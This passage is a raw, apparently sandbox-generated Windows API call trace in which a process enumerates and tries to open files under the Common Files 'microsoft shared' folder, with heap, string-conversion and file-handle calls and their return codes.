dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.839] AreFileApisANSI () returned 1 [0081.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0081.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0081.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0081.839] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0)) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0081.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.840] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0081.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.841] AreFileApisANSI () returned 1 [0081.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll", lpUsedDefaultChar=0x0) returned 75 [0081.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0081.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0081.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0081.841] AreFileApisANSI () returned 1 [0081.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0081.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 75 [0081.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.841] GetFileType (hFile=0x430) returned 0x1 [0081.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0081.841] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.842] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.842] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.842] CloseHandle (hObject=0x430) returned 1 [0081.842] AreFileApisANSI () returned 1 [0081.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85ee0 [0081.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 75 [0081.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.842] GetLastError () returned 0x20 [0081.842] GetLastError () returned 0x20 [0081.842] SetLastError (dwErrCode=0x20) [0081.842] GetLastError () returned 0x20 [0081.843] SetLastError (dwErrCode=0x20) [0081.843] GetLastError () returned 0x20 [0081.843] SetLastError (dwErrCode=0x20) [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0081.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.843] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x94, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x94, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓媰\x01⺊Ā鿐瞌먤聤̓㑍Ā̓蜐\x07̓뻌聤")) returned 0 [0081.843] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0081.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0081.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0081.844] AreFileApisANSI () returned 1 [0081.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink", lpUsedDefaultChar=0x0) returned 51 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0081.844] AreFileApisANSI () returned 1 [0081.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0081.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46278 [0081.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 51 [0081.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink" (normalized: "c:\\program files\\common files\\microsoft shared\\ink"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.844] GetLastError () returned 0x5 [0081.844] GetLastError () returned 0x5 [0081.844] SetLastError (dwErrCode=0x5) [0081.845] GetLastError () returned 0x5 [0081.845] SetLastError (dwErrCode=0x5) [0081.845] GetLastError () returned 0x5 [0081.845] SetLastError (dwErrCode=0x5) [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0081.845] AreFileApisANSI () returned 1 [0081.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0081.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46128 [0081.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46128, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 51 [0081.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink" (normalized: "c:\\program files\\common files\\microsoft shared\\ink"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.845] GetLastError () returned 0x5 [0081.845] GetLastError () returned 0x5 [0081.845] SetLastError (dwErrCode=0x5) [0081.845] GetLastError () returned 0x5 [0081.845] SetLastError (dwErrCode=0x5) [0081.845] GetLastError () returned 0x5 [0081.845] SetLastError (dwErrCode=0x5) [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0081.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0081.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0081.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0081.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0081.846] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0082.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0082.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0082.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0082.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0082.021] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78150 [0082.057] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.057] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc137d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 